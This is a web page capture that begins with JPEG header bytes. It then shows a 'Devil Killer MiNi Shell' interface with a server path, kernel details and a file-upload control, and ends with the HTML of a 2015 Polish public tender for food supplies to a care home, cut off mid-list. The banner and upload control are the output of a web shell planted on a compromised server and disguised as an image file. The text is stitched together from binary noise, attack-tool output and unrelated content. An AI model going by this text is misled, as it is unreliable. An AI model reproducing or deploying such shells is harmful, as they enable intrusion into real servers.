JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/123638-N-2015.html

<p class="kh_header"><b>Ruda Śląska: Dostawa artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 123638 - 2015; data zamieszczenia: 25.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.dps-senior.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie z podziałem na wyszczególnione poniżej pakiety:
Pakiet nr 1	Dostawa przetworów spożywczych 
Pakiet nr 2	Dostawa artykułów sypkich 
Pakiet nr 3	Dostawa artykułów nabiałowych 
Pakiet nr 4	Dostawa pieczywa 
Pakiet nr 5	Dostawa wypieków cukierniczych 
Pakiet nr 6	Dostawa warzyw świeżych i suszonych 
Pakiet nr 7	Dostawa owoców świeżych i suszonych
Pakiet nr 8	Dostawa warzyw i owoców mrożonych 
Pakiet nr 9	Dostawa ryb mrożonych, świeżych, wędzonych i przetworów rybnych 
Pakiet nr 10 	Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 11 	Dostawa mięsa i podrobów drobiowych 
Pakiet nr 12 	Dostawa wędlin
Pakiet nr 13 	Dostawa jaj kurzych
Pakiet nr 14 	Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 15 	Dostawa napojów bezalkoholowych 
Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia (SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.61.00.00-7, 15.82.11.50-5, 15.87.00.00-7, 15.50.00.00-3, 15.89.80.00-9, 15.81.00.00-9, 03.22.00.00-9, 15.33.24.10-1, 15.33.11.70-9, 15.20.00.00-0, 15.11.00.00-2, 15.11.40.00-0, 15.11.23.00-9, 15.13.11.30-5, 03.14.25.00-3, 15.84.00.00-8, 15.98.00.00-1, 15.89.80.00-9, 02.21.00.00-6, 15.33.24.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej SENIOR w Rudzie Śląskiej ul. Puszkina 7 Ruda Śląska 41-704 Dział Techniczno- Zaopatrzeniowy pok nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2015 godzina 11:30, miejsce: Dom Pomocy Społecznej SENIOR w Rudzie Śląskiej ul. Puszkina 7 Ruda Śląska 41-704 pok nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA PRZETWORÓW SPOŻYWCZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas kons. plastry-(masa netto bez zalewy)	300-1000g	kg	10

Brzoskwinie kons.-(masa netto bez zalewy) 	300-1000g 	kg	10

Chrzan tarty na kwasku cytrynowym	170-300g	kg	20

Ćwikła z chrzanem	250-500g	kg	10

Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) 	250-350g	kg	70

Fasola czerwona, biała konserwowa-(masa netto bez zalewy)	200-500g	kg	10

Fasola szparagowa konserwowa-(masa netto bez zalewy)	200-1000g	kg	40
Groszek konserwowy- (masa netto bez zalewy)	200-500g	kg	60

Ketchup łagodny(minimum 55% przecieru pomidorowego	250-1000g	kg	90

Koncentrat pomidorowy30%	800-1000g	kg	75

Koncentrat pomidorowy30%	180-250g	kg	30

Koncentrat buraczany płynny min.12% soku 
z buraków	180-500g	kg	7

Krem czekoladowy 
do smarowania z dodatkiem orzechów	180-400g	kg	12

Kukurydza konserwowa- (masa netto bez zalewy)	200-500g	kg	10

Miód naturalny	200-500g	kg	20

Musztarda delikatesowa	800-1000g	kg	80

Musztarda delikatesowa	150-250g	kg	40

Ocet 10%	0,5l	l	55

Ogórki konserwowe całe -(masa netto bez zalewy)	900-1000g	kg	115

Olej uniwersalny rzepakowy	0,90-1,0 l	l	360

Olej słonecznikowy	0,5-1,0l	l	10
Papryka konserwowa słodka płaty -(masa netto bez zalewy)	500-1000g	kg	6

Powidła śliwkowe	280-500g	kg	40

Przyprawa do zup w płynie	900-1000g	l	220

Seler konserwowy (nitki)-(masa netto bez zalewy)	280-500g	kg	7

Sos słodko kwaśny, chiński, meksykański, itp..	300-600g	kg	15

Zaprawa cytrynowa min.40%soku z cytryny	0,5-1l	l	
240

Majonez dekoracyjny sałatkowy	180-300g	kg	40
Majonez dekoracyjny sałatkowy	500-1000g	kg	75
Mielonka konserwowa - turystyczna, tyrolska, itp.	100-300g	kg	40

Szynka konserwowa wieprzowa 	100-300g	kg	13
Szynka konserwowa drobiowa 	100-300g	kg	13

Pasztet drobiowy smakowy	100-200g	kg	8
Pasztet drobiowy 	160g	kg	40
Pasztet wieprzowy	100-300g	kg	85
Rodzynki	100-500g	kg	2
Kokos - wiórki	100-500g	kg	0,5
Orzechy włoskie łuskane	100-500g	kg	1,5
Morele suszone	100-500g	kg	1,5
Migdały - płatki	50-200g	kg	1,2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW SYPKICH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń - różne smaki (bez dodatku cukru)	1000g	kg	30		
Budyń - różne smaki (bez dodatku cukru)	35-60g	kg	10		
Bulion grzybowy, sypki	500-1000g	kg	3		
Cukier kryształ	1000g	kg	1550		
Cukier wanilinowy	10-50g	kg	1,2		
Cynamon mielony	10-20g	kg	0,4		
Czosnek granulowany, polski	10-20g	kg	10		
Galaretka owocowa, różne smaki	75-100g	kg	25		
Gałka muszkatołowa, mielona	10-20g	kg	0,15		
Herbata expresowa owocowa, różne smaki, a 20 szt	30-40g	kg	1,2		
Herbata expresowa czarna a,100 szt.	100-150g	kg	65		
Herbata expresowa ziołowa  a 20 szt (mięta, melisa, rumianek)	30-40g	kg	0,5		
Imbir mielony	10 - 20g	kg	0,1		
Kakao naturalne ciemne (tłuszcz kakaowy min. 12%)	100-200g	kg	4		
Kasza gryczana, cała	500-1000g	kg	40		
Kasza jęczmienna , średnia	500-1000g	kg	75		
Kasza manna	500-1000g	kg	70		
Kaszka mleczno - ryżowa (smakowa)	230g	kg	12		
Kawa naturalna mielona 100%	100g	kg	18		
Kawa naturalna mielona 100%	250-500g	kg	40		
Kawa zbożowa	200-500g	kg	25		
Kleik ryżowy	160-200g	kg	6		
Kminek	10-20g	kg	0,3		
Kwasek cytrynowy	10-20g	kg	1
		
Liść laurowy	5-20g	kg	0,4		
Majeranek	5-20g	kg	1,2		
Makaron 4 jajeczny -          łazanki 	250-1000g	kg	40		
Makaron 4 jajeczny - nitki   	250-1000g	kg	75		
Makaron 4-jajeczny - (kolanka, rurki, muszelki, świderki) 	250-1000g	kg	140		
Mąka pszenna poznańska	1000g	kg	400		
Mąka ziemniaczana	1000g	kg	250		
Mąka żytnia żurek	1000g	kg	25		
Papryka słodka mielona	10-20g	kg	3		
Pieprz czarny mielony	10-20g	kg	4		
Płatki kukurydziane smakowe	500-1000g	kg	12		
Płatki owsiane	500g	kg	35		
Płatki ryżowe	200-500g	kg	25		
Przyprawa warzywna 
do potraw	75-200g	kg	18,5		
Rosół drobiowy,  sypki	500-3000g	kg	35		
Ryż biały	1000g	kg	140		
Sos pieczeniowy jasny	25-50g	kg	2,5		
Sos pieczeniowy ciemny	25-50g	kg	6		
Sos sałatkowy, różne smaki	8-20g	kg	0,5		
Sól spożywcza jodowana	1000g	kg	230		
Sucharki	280-300g	kg	6		
Ziele angielskie	10-20g	kg	0,5		
Żelatyna spożywcza wieprzowa	50g	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.84.10.00-5, 15.85.10.00-8, 15.86.00.00-4, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW NABIAŁOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	65		
Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	190		
 Jogurt owocowy 	115-200g	kg	320		
Jogurt naturalny 	150-200g	kg	150		
Maślanka naturalna karton	1L	l	350		
Maślanka owocowa	250-300g	kg	140		
Kefir naturalny	150-250g	kg	50		
Margaryna do smarowania pieczywa z dodatkiem masła	500g	kg	10		
Margaryna mleczna zwykła 	250g	kg	150		
Masło extra 82% 	200g	kg	900		
Mix tłuszczowy do smarowania min. 75 % tłuszczu (zawartość  tłuszczu mlecznego min. 12%)	200-250g	kg	150		
Mleko 2%  	5-20l 	l	6500		
Mleko 2% w folii	1l	l	300		
Ser biały półtłusty - krajanka	kg	kg	320		
Ser podpuszczkowy pleśniowy 	100-200g	kg	10		
Ser domowy z kminkiem	150-200g	kg	85		
Ser wielosmakowy fromage	75-100g	kg	65		
Ser żółty łagodny 45% tłuszczu	1000-3000g	kg	100		
Ser żółty wędzony	1000-2000g	kg	12		
Serek topiony kremowy -27% tł.(pochodzenia zwierzęcego)-różne smaki	100g	kg	100		
Serek topiony kremowy wędzony 	1000-2000g	kg	65		
Serek homogenizowany różne smaki	100-200g	kg	280		
Serek naturalny homogenizowany	100-200g	kg	75		
Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	85		
Serek twarożkowy wiejski ziarnisty	200g	kg	170		
Śmietanka do kawy 10% tłuszczu	10g	szt.	1200		
Śmietana spożywcza słodka 18% tłuszczu 	250-500ml	l	200		
Śmietana 12% tłuszczu homogenizowana 	180g-400g	kg	10		
Śmietana 30%tłuszczu- kremówka	200-500g	kg	12		
Smalec wieprzowy kostka	200-250g	kg	22		
Napój probiotyczny 	100g	kg	6		
Mleczko smakowe	200 - 400g	kg	6		
Drożdże piekarnicze świeże	42-100g	kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA PIECZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  pszenno- żytni krojony	900-1000g	kg	7200
Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itd.)	400-500g	kg	730
Wek krojony	300g-500g	kg	105
Bułka kajzerka	50g	kg	800
Pieczywo mleczne (rogal, chałka)	50g-100g	kg	50
Bułka mleczna	50g-80g	kg	95
Groszek ptysiowy		kg	2,5
Bułka tarta	400-500g	kg	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA WYPIEKÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rogalik z różnymi nadzieniami(budyń, śmietana, czekolada itp.)	70-100g	kg	100
Rogalik z różnymi nadzieniami z ograniczoną ilością cukru	70-100g	kg	30
Drożdżówka wielosmakowa (ser-mak, ser-marmolada )	80-120g	kg	80
Drożdżówka z ograniczoną ilością cukru	80-120g	kg	25
Jagodzianka	70-100g	kg	60
Jagodzianka z ograniczoną ilością cukru	70-100g	kg	20
Pączek z różnym nadzieniem (śmietana, marmolada, budyń, adwokat itd.)	80-100g	kg	100
Pączek z ograniczoną ilością cukru, bez polewy	80-100g	kg	30
Ciasto tortowe z kremem  ( na bazie budyniu),z owocami i galaretką owocową		kg	70
Tort okazjonalny - 100 lat urodzin (krem na bazie budyniu, owoce, galaretka owocowa, bita śmietana)		kg	8
Ciastko W-Z	80-100g	kg	18
Sernik 
na drożdżowym spodzie	 	kg	70
Ciasto drożdżowe z posypką	 	kg	20
Ciasto z owocami 
na drożdżowym spodzie 	 	kg	80
Ciasto z owocami 
na piaskowym spodzie	 	kg	105
Szarlotka	 	kg	75
Sernik na cieście ucieranym	 	kg	80
Rolada z bitą śmietaną	 	kg	40
Ptysie miniaturki ze śmietaną, budyniem, itp. 	 	kg	10
Ciasteczka kokosanki	 	kg	40
Piernik do moczki		kg	3,5
Piernik z bakaliami w czekoladzie	 	kg	20
Babeczki piaskowe	50-100g	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraki 	 	kg	440		
Botwinka 	 	kg	12		
Brokuły różyczka 	 	kg	5		
Cebula	 	kg	270		
Cebulka zielona, szczypiorek 
(m-c VII-X) 	 	kg	30		
Cebulka zielona, szczypiorek 
(m-c XI-XII)	 	kg	15		
Czosnek polski	 	kg	15		
Kalafior różyczka 	 	kg	170		
Kalarepa	 	kg	12		
Kapusta biała	 	kg	350		
Kapusta biała młoda 	 	kg	200		
Kapusta czerwona	 	kg	250		
Kapusta czerwona młoda 	 	kg	120		
Kapusta kiszona 	 	kg	400		
Kapusta pekińska	 	kg	90		
Kapusta włoska	 	kg	70		
Kapusta włoska młoda	 	kg	20		
Koperek zielony 
(m-c VII-X)	 	kg	40		
Koperek zielony 
(m-c XI - XII)	 	kg	20		
Ogórki kiszone	 	kg	80		
Ogórki małosolne	 	kg	27		
Ogórki zielone           (m-c VII - X   )	 	kg	140		
Ogórki zielone         (m-c XI - XII)	 	kg	20		
Papryka czerwona 	 	kg	17		
Pieczarki	 	kg	130		
Pietruszka korzeń	 	kg	350		
Pietruszka zielona     (m-c VII-X)	 	kg	55		
Pietruszka zielona   (m-c XI-XII)	 	kg	30		
Pomidory 
(m-c VII-X)	 	kg	260		
Pomidory 
(m-c XI- XII)	 	kg	100		
Por	 	kg	90		
Rzodkiewka              (m-c VII-X )	100g	pęczek	60		
Rzodkiewka 
(m-c XI-XII)	100g	pęczek	30		
Sałata zielona           (m-c VII-X  )	300g	szt	35		
Sałata zielona           (m-c XI-XII)	200g	szt	3		
Seler korzeń	 	kg	430		
Marchew	 	kg	1200		
Ziemniaki 	 	kg	8000		
Ziemniaki młode 	 	kg	1700		
Fasola kolorowa	 	kg	25		
Fasola Jaś	 	kg	35		
Fasolka szparagowa		kg	80		
Groch łuszczony	 	kg	30		
Pasternak		kg	1		
Mak niebieski		kg	10		
Grzyby suszone	 	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DOSTAWA OWOCÓW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz		kg	350
Banany	200g/szt.	kg	1000
Brzoskwinia 	150g/szt.	kg	120
Cytryny		kg	1
Czereśnie		kg	50
Grapefruit	300-350g/szt.	kg	130
Jabłka		kg	600
Jabłka deserowe 	200g/szt.	kg	600
Jagody		kg	15
Morele deserowe		kg	70
Mandarynki	80-100g/szt.	kg	300
Nektaryny	150g/szt.	kg	40
Owoce kiwi	100-120g/szt.	kg	70
Pomarańcze	200-250g/szt.	kg	350
Truskawki świeże		kg	30
Śliwki		kg	350
Śliwki deserowe		kg	260
Winogrona deserowe (m-c VII-X)		kg	200
Winogrona deserowe (m-c XI - XII)		kg	10
Wiśnie		kg	60
Rabarbar		kg	120
Gruszki deserowe	200g/szt.	kg	100
Gruszki suszone		kg	3
Śliwki suszone bez pestek		kg	7
Jabłka suszone		kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.24.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DOSTAWA WARZYW I OWOCÓW MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły 	450g	kg	5		
Brokuły 	2000-2500g	kg	60		
Brukselka	450g	kg	5		
Brukselka	2000-2500g	kg	40		
Kalafior	450g	kg	5		
Kalafior	2000-2500g	kg	75		
Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	450g	kg	20		
Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	2000-2500g	kg	490		
Szpinak	450g	kg	5		
Szpinak	2000-2500g	kg	150		
Truskawki	450g	kg	5		
Truskawki	2000-2500g	kg	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> DOSTAWA RYB MROŻONYCH, ŚWIEŻYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z zielonego śledzia	 	kg	90		
Filet z tilapii b/skóry, zawartość glazury do 20%	 	kg	75		
Filet z morszczuka, b/skóry, płaty SHP		kg	40		
Filet z dorsza , b/skóry,
płaty SHP	 	kg	40		
Filet z pangi trymowanej, płaty SHP	 	kg	250		
Filet z matiasa b/skóry solony (masa netto bez zalewy)	1000-4000	kg	80		
Filet z matiasa b/skóry solony (masa netto bez zalewy)	100-900g	kg	10		
Filety śledziowe w oleju z różnymi dodatkami 
(masa netto bez zalewy)	1000-4000g	kg	25		
Filety śledziowe w oleju z różnymi dodatkami
(masa netto bez zalewy)	100-900g	kg	5		
Sałatka z filetów śledziowych
w majonezie 	1000-4000g	kg	35		
Sałatka z filetów śledziowych 
w majonezie 	100-900g	kg	4		
Sałatka -krajanka z filetów śledziowych w oleju z różnymi dodatkami 
